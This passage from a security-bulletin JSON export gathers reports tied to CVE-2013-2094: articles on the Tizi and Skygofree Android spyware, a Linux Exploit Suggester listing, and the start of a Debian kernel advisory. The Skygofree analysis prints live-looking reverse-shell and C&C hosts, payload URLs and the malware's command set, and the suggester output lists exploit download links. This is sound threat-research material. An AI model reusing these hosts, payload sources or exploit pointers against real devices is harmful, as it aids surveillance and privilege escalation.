users\u2019 knowledge. Because there is no patch available yet for this flaw, so we recommend users to download apps from reputable marketplaces only.\n", "modified": "2013-10-14T11:48:19", "published": "2013-06-12T07:00:00", "id": "THN:6C6DBC3B917F276B59D2AE2592818634", "href": "http://thehackernews.com/2013/06/android-malware-loaded-with-linux.html", "type": "thn", "title": "Android malware loaded with Linux kernel privilege escalation exploit", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:25", "bulletinFamily": "info", "cvelist": ["CVE-2013-2596", "CVE-2012-4220", "CVE-2013-2597", "CVE-2014-3153", "CVE-2015-3636", "CVE-2013-2094", "CVE-2013-6282", "CVE-2013-2595", "CVE-2015-1805"], "description": "[](<https://3.bp.blogspot.com/-vajt220Zj4I/Wh0Uku8BM7I/AAAAAAAAu9I/bRr5OKxvItEeRJPcdJalda6ThesHt_1qQCLcBGAs/s1600/android-spying-app.png>)\n\nIn an attempt to protect Android users from malware and shady apps, Google has been continuously working to detect and remove malicious apps from your devices using its newly launched Google Play Protect service. \n \n[Google Play Protect](<https://thehackernews.com/2017/05/google-play-protect-android.html>)\u2014a security feature that uses machine learning and app usage analysis to check devices for potentially harmful apps\u2014recently helped Google researchers to identify a new deceptive family of Android spyware that was stealing a whole lot of information on users. \n \nDiscovered on targeted devices in African countries, Tizi is a fully-featured Android backdoor with rooting capabilities that installs spyware apps on victims' devices to steal sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. \n\n\n> \"The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities,\" Google said in a [blog post](<https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html>). \"The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015.\"\n\nMost Tizi-infected apps are being advertised on social media websites and 3rd-party app stores, tricking users into installing them. \n \nOnce installed, the innocent looking app gains root access of the infected device to install spyware, which then first contacts its command-and-control servers by sending an SMS text message with the GPS coordinates of the infected device to a specific number. \n \n\n\n### Here's How Tizi Gains Root Access On Infected Devices\n\n \nFor gaining root access, the backdoor exploits previously disclosed vulnerabilities in older chipsets, devices, and Android versions, including CVE-2012-4220, CVE-2013-2596, CVE-2013-2597, CVE-2013-2595, CVE-2013-2094, CVE-2013-6282, CVE-2014-3153, CVE-2015-3636, and CVE-2015-1805. \n \nIf the backdoor unable to take root access on the infected device due to all the listed vulnerabilities being patched, \"_it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls,_ \" Google said. \n \nTizi spyware also been designed to communicate with its command-and-control servers over regular HTTPS or using MQTT messaging protocol to receive commands from the attackers and uploading stolen data. \n \nThe Tizi backdoor contains various capabilities common to commercial spyware, such as \n \n\n\n * Stealing data from popular social media platforms including Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram.\n * Recording calls from WhatsApp, Viber, and Skype.\n * Sending and receiving SMS messages.\n * Accessing calendar events, call log, contacts, photos, and list of installed apps\n * Stealing Wi-Fi encryption keys.\n * Recording ambient audio and taking pictures without displaying the image on the device's screen.\n \nSo far Google has identified 1,300 Android devices infected by Tizi and removed it. \n \nMajority of which were located in African countries, specifically Kenya, Nigeria, and Tanzania. \n \n\n\n### \nHow to Protect your Android device from Hackers?\n\n \nSuch Android spyware can be used to target your devices as well, so you if own an Android device, you are strongly recommended to follow these simple steps in order to protect yourself: \n \n\n\n * Ensure that you have already opted for Google Play Protect.\n * Download and install apps only from the official Play Store, and always check permissions for each app.\n * Enable 'verify apps' feature from settings.\n * Protect your devices with pin or password lock so that nobody can gain unauthorized access to your device when remains unattended.\n * Keep \"unknown sources\" disabled while not using it.\n * Keep your device always up-to-date with the latest security patches.\n", "modified": "2017-11-28T10:50:18", "published": "2017-11-27T22:29:00", "id": "THN:C8A4219AFC2880AC311776A8C10BAE97", "href": "https://thehackernews.com/2017/11/android-spying-app.html", "type": "thn", "title": "Google Detects Android Spyware That Spies On WhatsApp, Skype Calls", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-01-17T15:58:19", "bulletinFamily": "blog", "cvelist": ["CVE-2013-2094", "CVE-2013-2595", "CVE-2013-6282", "CVE-2014-3153", "CVE-2015-3636"], "description": "\n\nAt the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago \u2013 at the end of 2014. Since then, the implant's functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.\n\nWe observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy.\n\nMoreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild.\n\nWe named the malware Skygofree, because we found the word in one of the domains*. \n\n## Malware Features\n\n### Android\n\nAccording to the observed samples and their signatures, early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-1.png>)\n\n_Signature of one of the earliest versions_\n\nThe code and functionality have changed numerous times; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device. We have examined all the detected versions, including the latest one that is signed by a certificate valid from September 14, 2017.\n\nThe implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.\n\nAfter manual launch, it shows a fake welcome notification to the user:\n\n_Dear Customer, we're updating your configuration and it will be ready as soon as possible._\n\nAt the same time, it hides an icon and starts background services to hide further actions from the user.\n\n**Service Name** | **Purpose** \n---|--- \nAndroidAlarmManager | Uploading last recorded .amr audio \nAndroidSystemService | Audio recording \nAndroidSystemQueues | Location tracking with movement detection \nClearSystems | GSM tracking (CID, LAC, PSC) \nClipService | Clipboard stealing \nAndroidFileManager | Uploading all exfiltrated data \nAndroidPush | XMPP \u0421&C protocol (url.plus:5223) \nRegistrationService | Registration on C&C via HTTP (url.plus/app/pro/) \n \nInterestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-2.png>)\n\nCybercriminals have the ability to control the implant via HTTP, XMPP, binary SMS and [FirebaseCloudMessaging](<https://firebase.google.com/docs/cloud-messaging/>) (or GoogleCloudMessaging in older versions) protocols. Such a diversity of protocols gives the attackers more flexible control. In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. Here are some of the most notable:\n\n * 'geofence' - this command adds a specified location to the implant's internal database and when it matches a device's current location the malware triggers and begins to record surrounding audio.\n * \"social\" \u2013 this command that starts the 'AndroidMDMSupport' service - this allows the files of any other installed application to be grabbed. The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools. The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading. \n\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-3.png>)\n\n_Several hardcoded applications targeted by the MDM-grabbing command_\n\n * 'wifi' \u2013 this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled. So, when a device connects to the established network, this process will be in silent and automatic mode. This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle (MitM) attacks. \n\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-4.png>)\n\n_addWifiConfig method code fragments_\n\n * 'camera' \u2013 this command records a video/capture a photo using the front-facing camera when someone next unlocks the device.\n\nSome versions of the Skygofree feature the self-protection ability exclusively for Huawei devices. There is a 'protected apps' list in this brand's smartphones, related to a battery-saving concept. Apps not selected as protected apps stop working once the screen is off and await re-activation, so the implant is able to determine that it is running on a Huawei device and add itself to this list. Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices.\n\nAlso, we found a debug version of the implant (70a937b2504b3ad6c623581424c7e53d) that contains interesting constants, including the version of the spyware.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-5.png>)\n\n_Debug BuildConfig with the version_\n\nAfter a deep analysis of all discovered versions of Skygofree, we made an approximate timeline of the implant's evolution.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-6.png>)\n\n_Mobile implant evolution timeline_\n\nHowever, some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection. Below is a list of the payloads used by the Skygofree implant in the second and third stages.\n\n#### Reverse shell payload\n\nThe reverse shell module is an external ELF file compiled by the attackers to run on Android. The choice of a particular payload is determined by the implant's version, and it can be downloaded from the command and control (C&C) server soon after the implant starts, or after a specific command. In the most recent case, the choice of the payload zip file depends on the device process architecture. For now, we observe only one payload version for following the ARM CPUs: arm64-v8a, armeabi, armeabi-v7a.\n\nNote that in almost all cases, this payload file, contained in zip archives, is named 'setting' or 'setting.o'.\n\nThe main purpose of this module is providing reverse shell features on the device by connecting with the C&C server's socket.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-7.png>)\n\n_Reverse shell payload_\n\nThe payload is started by the main module with a specified host and port as a parameter that is hardcoded to '54.67.109.199' and '30010' in some versions:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-8.png>)\n\nAlternatively, they could be hardcoded directly into the payload code:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-8-5.gif>)\n\nWe also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-9.png>)\n\n_Equipped reverse shell payload with specific string_\n\nAfter an in-depth look, we found that some versions of the reverse shell payload code share similarities with PRISM - a stealth reverse shell backdoor that is available on [Github](<https://github.com/andreafabrizi/prism/>).\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-10.png>)\n\n_Reverse shell payload from update_dev.zip_\n\n#### Exploit payload\n\nAt the same time, we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges. According to several timestamps, this payload is used by implant versions created since 2016. It can also be downloaded by a specific command. The exploit payload contains following file components:\n\n**Component name** | **Description** \n---|--- \nrun_root_shell/arrs_put_user.o/arrs_put_user/poc | Exploit ELF \ndb | Sqlite3 tool ELF \ndevice.db | Sqlite3 database with supported devices and their constants needed for privilege escalation \n \n'device.db' is a database used by the exploit. It contains two tables - 'supported_devices' and 'device_address'. The first table contains 205 devices with some Linux properties; the second contains the specific memory addresses associated with them that are needed for successful exploitation. You can find a full list of targeted models in the Appendix.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-11.png>)\n\n_Fragment of the database with targeted devices and specific memory addresses_\n\nIf the infected device is not listed in this database, the exploit tries to discover these addresses programmatically.\n\nAfter downloading and unpacking, the main module executes the exploit binary file. Once executed, the module attempts to get root privileges on the device by exploiting the following vulnerabilities:\n\nCVE-2013-2094 \nCVE-2013-2595 \nCVE-2013-6282 \nCVE-2014-3153 (futex aka [TowelRoot](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>)) \nCVE-2015-3636\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-12.png>)\n\n_Exploitation process_\n\nAfter an in-depth look, we found that the exploit payload code shares several similarities with the public project [android-rooting-tools](<https://github.com/android-rooting-tools>).\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-13.png>)\n\n_Decompiled exploit function code fragment_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-14.png>)\n\n_run_with_mmap function from the android-rooting-tools project_\n\nAs can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.\n\n#### Busybox payload\n\nBusybox is public software that provides several Linux tools in a single ELF file. In earlier versions, it operated with shell commands like this:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-15.png>)\n\n_Stealing WhatsApp encryption key with Busybox_\n\n#### Social payload\n\nActually, this is not a standalone payload file \u2013 in all the observed versions its code was compiled with exploit payload in one file ('poc_perm', 'arrs_put_user', 'arrs_put_user.o'). This is due to the fact that the implant needs to escalate privileges before performing social payload actions. This payload is also used by the earlier versions of the implant. It has similar functionality to the 'AndroidMDMSupport' command from the current versions \u2013 stealing data belonging to other installed applications. The payload will execute shell code to steal data from various applications. The example below steals Facebook data:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-16.png>)\n\nAll the other hardcoded applications targeted by the payload:\n\n**Package name** | **Name** \n---|--- \njp.naver.line.android | LINE: Free Calls & Messages \ncom.facebook.orca | Facebook messenger \ncom.facebook.katana | Facebook \ncom.whatsapp | WhatsApp \ncom.viber.voip | Viber \n \n#### Parser payload\n\nUpon receiving a specific command, the implant can download a special payload to grab sensitive information from external applications. The case where we observed this involved WhatsApp.\n\nIn the examined version, it was downloaded from:\n\n_hxxp://url[.]plus/Updates/tt/parser.apk_\n\nThe payload can be a .dex or .apk file which is a Java-compiled Android executable. After downloading, it will be loaded by the main module via DexClassLoader api:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-17.png>)\n\nAs mentioned, we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way. The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-18.png>)\n\nNote that the implant needs special permission to use the Accessibility Service API, but there is a command that performs a request with a phishing text displayed to the user to obtain such permission.\n\n### Windows\n\nWe have found multiple components that form an entire spyware system for the Windows platform.\n\n**Name** | **MD5** | **Purpose** \n---|---|--- \nmsconf.exe | 55fb01048b6287eadcbd9a0f86d21adf | Main module, reverse shell \nnetwork.exe | f673bb1d519138ced7659484c0b66c5b | Sending exfiltrated data \nsystem.exe | d3baa45ed342fbc5a56d974d36d5f73f | Surrounding sound recording by mic \nupdate.exe | 395f9f87df728134b5e3c1ca4d48e9fa | Keylogging \nwow.exe | 16311b16fd48c1c87c6476a455093e7a | Screenshot capturing \nskype_sync2.exe | 6bcc3559d7405f25ea403317353d905f | Skype call recording to MP3 \n \nAll modules, except skype_sync2.exe, are written in Python and packed to binary files via the Py2exe tool. This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries.\n\nmsconf.exe is the main module that provides control of the implant and reverse shell feature. It opens a socket on the victim's machine and connects with a server-side component of the implant located at 54.67.109.199:6500. Before connecting with the socket, it creates a malware environment in 'APPDATA/myupd' and creates a sqlite3 database there \u2013 'myupd_tmp\\\\\\mng.db':\n\nCREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL); \nINSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0 )\n\nFinally, the malware modifies the 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' registry key to enable autostart of the main module.\n\nThe code contains multiple comments in Italian, here is the most noteworthy example:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-19.png>)\n\n_\"Receive commands from the remote server, here you can set the key commands to command the virus\"_\n\nHere are the available commands:\n\n| **Name** | **Description** \n---|--- \ncd | Change current directory to specified \nquit | Close the socket \nnggexe | Execute received command via Python's subprocess.Popen() without outputs \nngguploads | Upload specified file to the specified URL \nnggdownloads | Download content from the specified URLs and save to specified file \nnggfilesystem | Dump file structure of the C: path, save it to the file in json format and zip it \nnggstart_screen \nnggstop_screen | Enable/disable screenshot module. When enabled, it makes a screenshot every 25 seconds \nnggstart_key \nnggstop_key | Enable/disable keylogging module \nnggstart_rec \nnggstop_rec | Enable/disable surrounding sounds recording module \nngg_status | Send components status to the C&C socket \n*any other* | Execute received command via Python's subprocess.Popen(), output result will be sent to the C&C socket. \n \nAll modules set hidden attributes to their files:\n\n**Module** | **Paths** | **Exfiltrated data format** \n---|---|--- \nmsconf.exe | %APPDATA%/myupd/gen/ | %Y%m%d-%H%M%S_filesystem.zip (file structure dump) \nsystem.exe | %APPDATA%/myupd/aud/ | %d%m%Y%H%M%S.wav (surrounding sounds) \nupdate.exe | %APPDATA%/myupd_tmp/txt/ \n%APPDATA%/myupd/txt/ | %Y%m%d-%H%M%S.txt (keylogging) \nwow.exe | %APPDATA%/myupd/scr/ | %Y%m%d-%H%M%S.jpg (screenshots) \nskype_sync2.exe | %APPDATA%/myupd_tmp/skype/ \n%APPDATA%/myupd/skype/ | yyyyMMddHHmmss_in.mp3 \nyyyyMMddHHmmss_out.mp3 \n(skype calls records) \n \nMoreover, we found one module written in .Net - skype_sync2.exe. The main purpose of this module is to exfiltrate Skype call recordings. Just like the previous modules, it contains multiple strings in Italian.\n\nAfter launch, it downloads a codec for MP3 encoding directly from the C&C server:\n\n_http://54.67.109.199/skype_resource/libmp3lame.dll_\n\nThe skype_sync2.exe module has a compilation timestamp - Feb 06 2017 and the following PDB string:\n\n_\\\\\\vmware-host\\Shared \nFolders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb_\n\nnetwork.exe is a module for submitting all exfiltrated data to the server. In the observed version of the implant it doesn't have an interface to work with the skype_sync2.exe module.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-20.png>)\n\n_network.exe submitting to the server code snippet_\n\n#### Code similarities\n\nWe found some code similarities between the implant for Windows and other public accessible projects.\n\n * https://github.com/El3ct71k/Keylogger/\n\nIt appears the developers have copied the functional part of the keylogger module from this project.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-21.png>)\n\n_update.exe module and Keylogger by 'El3ct71k' code comparison_\n\n * [Xenotix Python Keylogger](<https://github.com/ajinabraham/Xenotix-Python-Keylogger/>) including specified mutex 'mutex_var_xboz'.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-22.png>)\n\n_update.exe module and Xenotix Python Keylogger code comparison_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-23.png>)\n\n_'addStartup' method from msconf.exe module_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-24.png>)\n\n_'addStartup' method from Xenotix Python Keylogger_\n\n## Distribution\n\nWe found several landing pages that spread the Android implants.\n\n**Malicious URL** | **Referrer** | **Dates** \n---|---|--- \nhttp://217.194.13.133/tre/internet/Configuratore_3.apk | http://217.194.13.133/tre/internet/ | 2015-02-04 to \npresent time \nhttp://217.194.13.133/appPro_AC.apk | - | 2015-07-01 \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | 2015-01-20 to \npresent time \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone%20Configuratore.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | currently active \nhttp://vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk | http://vodafoneinfinity.sytes.net/tim/internet/ | 2015-03-04 \nhttp://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ | 2015-01-14 \nhttp://windupdate.serveftp.com/wind/LTE/WIND%20Configuratore%20v5_4_2.apk | http://windupdate.serveftp.com/wind/LTE/ | 2015-03-31 \nhttp://119.network/lte/Internet-TIM-4G-LTE.apk | http://119.network/lte/download.html | 2015-02-04 \n2015-07-20 \nhttp://119.network/lte/Configuratore_TIM.apk | 2015-07-08 \n \nMany of these domains are outdated, but almost all (except one - appPro_AC.apk) samples located on the 217.194.13.133 server are still accessible. All the observed landing pages mimic the mobile operators' web pages through their domain name and web page content as well.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-25.png>)\n\n_Landing web pages that mimic the Vodafone and Three mobile operator sites_\n\nNETWORK CONFIGURATION \n** AGG. 2.3.2015 *** \nDear Customer, in order to avoid malfunctions to your internet connection, we encourage you to upgrade your configuration. Download the update now and keep on navigating at maximum speed! \nDOWNLOAD NOW \nDo you doubt how to configure your smartphone? \nFollow the simple steps below and enter the Vodafone Fast Network. \nInstallation Guide \nDownload \nClick on the DOWNLOAD button you will find on this page and download the application on your smartphone. \nSet your Smartphone \nGo to Settings-> Security for your device and put a check mark on Unknown Sources (some models are called Sources Unknown). \nInstall \nGo to notifications on your device (or directly in the Downloads folder) and click Vodafone Configuration Update to install. \nTry high speed \nRestart your device and wait for confirmation sms. Your smartphone is now configured.\n\nFurther research of the attacker's infrastructure revealed more related mimicking domains.\n\nUnfortunately, for now we can't say in what environment these landing pages were used in the wild, but according to all the information at our dsiposal, we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks. For example, this could be when the victim's device connects to a Wi-Fi access point that is infected or controlled by the attackers.\n\n## Artifacts\n\nDuring the research, we found plenty of traces of the developers and those doing the maintaining.\n\n * As already stated in the 'malware features' part, there are multiple giveaways in the code. Here are just some of them:\n**ngglobal _- _**_FirebaseCloudMessaging topic name_ \n--- \n**Issuer: CN = negg** - _from several certificates_ \n**negg.ddns[.]net, negg1.ddns[.]net, negg2.ddns[.]net - **_C&C servers_ \n**NG SuperShell - **_string from the reverse shell payload_ \n**ngg - **_prefix in commands names of the implant for Windows_ \n \n[](<https://securelist.com/files/2018/01/180115-skygofree-26.png>)\n\n_Signature with specific issuer_\n\n * Whois records and IP relationships provide many interesting insights as well. There are a lot of other 'Negg' mentions in Whois records and references to it. For example:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-27.png>)\n\n## Conclusions\n\nThe Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform. As a result of the long-term development process, there are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, never-before-seen surveillance features such as recording surrounding audio in specified locations.\n\nGiven the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam.\n\n##### Notes\n\n*Skygofree has no connection to Sky, Sky Go or any other subsidiary of Sky, and does not affect the Sky Go service or app.\n\n[ **Skygofree Appendix \u2014 Indicators of Compromise (PDF)**](<https://securelist.com/files/2018/01/Skygofree_appendix_eng.pdf>)", "modified": "2018-01-16T10:00:58", "published": "2018-01-16T10:00:58", "href": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "id": "SECURELIST:52B19EC96333D6EAA616F8D528A8E64A", "type": "securelist", "title": "Skygofree: Following in the footsteps of HackingTeam", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-06-26T15:22:17", "bulletinFamily": "tools", "cvelist": ["CVE-2012-0056", "CVE-2010-4073", "CVE-2009-2692", "CVE-2009-1185", "CVE-2010-3437", "CVE-2010-2959", "CVE-2010-1146", "CVE-2010-0415", "CVE-2010-3850", "CVE-2009-3547", "CVE-2010-3848", "CVE-2010-3081", "CVE-2010-4347", "CVE-2013-2094", "CVE-2010-3301"], "description": "[  ](<https://1.bp.blogspot.com/-jjNBJYYYOfM/Uh6Zsnl9R8I/AAAAAAAAA7s/ILYnNooO8lA/s1600/perl.jpg>) Linux Exploit Suggester; based on operating system release number. \n\n \n\n\nThis program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. \n\n \n\n\nAdditionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version. \n\n \n\n\nThis script has been extremely useful on site and in exams. Now Open-sourced under GPLv2. \n\n \nSample Output \n\n \n \n $ perl ./Linux_Exploit_Suggester.pl -k 3.0.0\n \n Kernel local: 3.0.0\n \n Possible Exploits:\n [+] semtex\n CVE-2013-2094\n Source: www.exploit-db.com/download/25444/\u200e\n [+] memodipper\n CVE-2012-0056\n Source: http://www.exploit-db.com/exploits/18411/\n [+] perf_swevent\n CVE-2013-2094\n Source: http://www.exploit-db.com/download/26131\n \n \n \n $ perl ./Linux_Exploit_Suggester.pl -k 2.6.28\n \n Kernel local: 2.6.28\n \n Possible Exploits:\n [+] sock_sendpage2\n Alt: proto_ops CVE-2009-2692\n Source: http://www.exploit-db.com/exploits/9436\n [+] half_nelson3\n Alt: econet CVE-2010-4073\n Source: http://www.exploit-db.com/exploits/17787/\n [+] reiserfs\n CVE-2010-1146\n Source: http://www.exploit-db.com/exploits/12130/\n [+] pktcdvd\n CVE-2010-3437\n Source: http://www.exploit-db.com/exploits/15150/\n [+] american-sign-language\n CVE-2010-4347\n Source: http://www.securityfocus.com/bid/45408/\n [+] half_nelson\n Alt: econet CVE-2010-3848\n Source: http://www.exploit-db.com/exploits/6851\n [+] udev\n Alt: udev <1.4.1 CVE-2009-1185\n Source: http://www.exploit-db.com/exploits/8478\n [+] do_pages_move\n Alt: sieve CVE-2010-0415\n Source: Spenders Enlightenment\n [+] pipe.c_32bit\n CVE-2009-3547\n Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c\n [+] exit_notify\n Source: http://www.exploit-db.com/exploits/8369\n [+] can_bcm\n CVE-2010-2959\n Source: http://www.exploit-db.com/exploits/14814/\n [+] ptrace_kmod2\n Alt: ia32syscall,robert_you_suck CVE-2010-3301\n Source: http://www.exploit-db.com/exploits/15023/\n [+] half_nelson1\n Alt: econet CVE-2010-3848\n Source: http://www.exploit-db.com/exploits/17787/\n [+] half_nelson2\n Alt: econet CVE-2010-3850\n Source: http://www.exploit-db.com/exploits/17787/\n [+] sock_sendpage\n Alt: wunderbar_emporium CVE-2009-2692\n Source: http://www.exploit-db.com/exploits/9435\n [+] video4linux\n CVE-2010-3081\n Source: http://www.exploit-db.com/exploits/15024/\n \n\n \n\n\n[ ** Download Linux Exploit Suggester ** ](<https://github.com/PenturaLabs/Linux_Exploit_Suggester>)\n", "edition": 14, "modified": "2013-08-29T00:48:05", "published": "2013-08-29T00:48:05", "id": "KITPLOIT:5310354020898253604", "href": "http://www.kitploit.com/2013/08/linux-exploit-suggester-grab-linux.html", "title": "[Linux Exploit Suggester] Grab the Linux Operating Systems release version, and return a suggestive list of possible exploits", "type": "kitploit", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:00:43", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3228", "CVE-2013-0160", "CVE-2013-3231", "CVE-2013-3229", "CVE-2013-3224", "CVE-2013-3301", "CVE-2013-3234", "CVE-2013-3227", "CVE-2013-2015", "CVE-2013-1929", "CVE-2013-3225", "CVE-2013-1979", "CVE-2013-3222", "CVE-2013-3076", "CVE-2013-2094", "CVE-2013-1796", "CVE-2013-3235", "CVE-2013-3223"], "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2669-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier\nMay 15, 2013 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux\nVulnerability : privilege escalation/denial of service/information leak\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2013-0160 CVE-2013-1796 CVE-2013-1929 CVE-2013-1979\n CVE-2013-2015 CVE-2013-2094 CVE-2013-3076 CVE-2013-3222\n CVE-2013-3223 CVE-2013-3224 CVE-2013-3225 CVE-2013-3227\n CVE-2013-3228 CVE-2013-3229 CVE-2013-3231 CVE-2013-3234\n CVE-2013-3235 CVE-2013-3301\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a denial of service, information leak or privilege escalation. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2013-0160\n\n vladz reported a timing leak with the /dev/ptmx character device. A local\n user could use this to determine sensitive information such as password\n length.\n\nCVE-2013-1796\n\n Andrew Honig of Google reported an issue in the KVM subsystem. A user in\n a guest operating system could corrupt kernel memory, resulting in a\n denial of service.\n\nCVE-2013-1929\n\n Oded Horovitz and Brad Spengler reported an issue in the device driver for\n Broadcom Tigon3 based gigabit Ethernet. Users with the ability to attach\n untrusted devices can create an overflow condition, resulting in a denial\n of service or elevated privileges.\n\nCVE-2013-1979\n\n Andy Lutomirski reported an issue in the socket level control message\n processing subsystem. Local users maybe able to gain eleveated privileges.\n\nCVE-2013-2015\n\n Theodore Ts'o provided a fix for an issue in the ext4 filesystem. Local\n users with the ability to mount a specially crafted filesystem can cause\n a denial of service (infinite loop).\n\nCVE-2013-2094\n\n Tommie Rantala discovered an issue in the perf subsystem. An out-of-bounds\n access vulnerability allows local users to gain elevated privileges.\n\nCVE-2013-3076\n\n Mathias Krauss discovered an issue in the userspace interface for hash\n algorithms. Local users can gain access to sensitive kernel memory.\n \nCVE-2013-3222\n\n Mathias Krauss discovered an issue in the Asynchronous Transfer Mode (ATM)\n protocol support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3223\n\n Mathias Krauss discovered an issue in the Amateur Radio AX.25 protocol\n support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3224\n\n Mathias Krauss discovered an issue in the Bluetooth subsystem. Local users\n can gain access to sensitive kernel memory.\n\nCVE-2013-3225\n\n Mathias Krauss discovered an issue in the Bluetooth RFCOMM protocol\n support. Local users can gain access to sensitive kernel memory.\n \nCVE-2013-3227\n\n Mathias Krauss discovered an issue in the Communication CPU to Application\n CPU Interface (CAIF). Local users can gain access to 